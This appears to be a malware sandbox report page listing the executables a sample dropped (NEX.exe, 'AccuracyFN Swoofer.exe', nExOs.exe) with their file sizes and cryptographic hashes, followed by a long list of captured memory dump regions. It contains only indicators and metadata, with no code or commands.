cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\NEX.exe

Filesize
46KB

MD5
49592068de00ac0b55980502a7a78a18

SHA1
43237168c7d0170076c466f9a738e0c30dbceb16

SHA256
08966125b28e88837732b990977124b7ab7393474cc10770375370af3801a898

SHA512
6340d949dcd79be953a8781f764e63154b63fb3f24e316c0e6b81fa9ec773c9087a529e8cef90d4ec3ad8f611855b298cefbc85b608ea32a014ceaaabd128f78

Download Submit
\Users\Admin\AppData\Local\Temp\AccuracyFN Swoofer.exe

Filesize
19KB

MD5
d9f380de63eb79d069848b7fa8093e19

SHA1
f06585fc7d08dc67c1cb6171415a33ffb8683189

SHA256
b6cb8289496b89de66a1d22897053403acc3b6f88aa64e20b975a42bf937ce34

SHA512
794616dd385dedf61c8ec93dcefb358f1f0b778ccb62588557b8be2ca59d555dced9738af1f0d1045557fb4a7a127e071cca525dea4ad630f5dfe25889a32ed5

Download Submit
\Users\Admin\AppData\Local\Temp\nExOs.exe

Filesize
1.6MB

MD5
23e4c238bcb922264e053daddc9386f9

SHA1
096327749ff3f913c67785b8110ec5ada1f414ee

SHA256
775d7e68654c70a764f72629812eda2b73520eeac12efb42d60efda16d8225a0

SHA512
34c59ab73aa231b224ea1a2b62f3a4956f8a556acb7abc2f4c1e3e1a9939b3bd49a378d0649d2a541b1cbc763b7bd5187e977d8eb94115603217bc6d7c93aebe

Download Submit
memory/448-165-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/448-164-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2268-140-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2268-139-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2308-221-0x0000000001160000-0x000000000117E000-memory.dmp

Filesize
120KB

Download
memory/2428-199-0x000000013F620000-0x000000013F630000-memory.dmp

Filesize
64KB

Download
memory/2584-158-0x00000000026F0000-0x00000000026F8000-memory.dmp

Filesize
32KB

Download
memory/2584-157-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/2676-58-0x000000013F1C0000-0x000000013F1D0000-memory.dmp

Filesize
64KB

Download
memory/2716-61-0x0000000000B40000-0x0000000000BD8000-memory.dmp

Filesize
608KB

Download
memory/2784-346-0x0000000002070000-0x0000000002170000-memory.dmp

Filesize
1024KB

Download
memory/2784-337-0x0000000002070000-0x0000000002170000-memory.dmp

Filesize
1024KB

Download
memory/2784-340-0x0000000002070000-0x0000000002170000-memory.dmp

Filesize
1024KB

Download
memory/2784-342-0x0000000002070000-0x0000000002170000-memory.dmp

Filesize
1024KB

Download
memory/2784-338-0x0000000002070000-0x0000000002170000-memory.dmp

Filesize
1024KB

Download
memory/2784-339-0x0000000002070000-0x0000000002170000-memory.dmp

Filesize
1024KB

Download
memory/2784-343-0x0000000002070000-0x0000000002170000-memory.dmp

Filesize
1024KB

Download
memory/2784-341-0x0000000002070000-0x0000000002170000-memory.dmp

Filesize
1024KB

Download
memory/2860-56-0x0000000140000000-0x0000000140567000-memory.dmp

Filesize
5.4MB

Download
memory/2900-60-0x0000000001290000-0x00000000012A8000-memory.dmp

Filesize
96KB

Download
memory/2912-59-0x00000000000D0000-0x00000000000EE000-memory.dmp

Filesize
120KB

Download
memory/3064-128-0x0000000000300000-0x0000000000318000-memory.dmp

Filesize
96KB

Download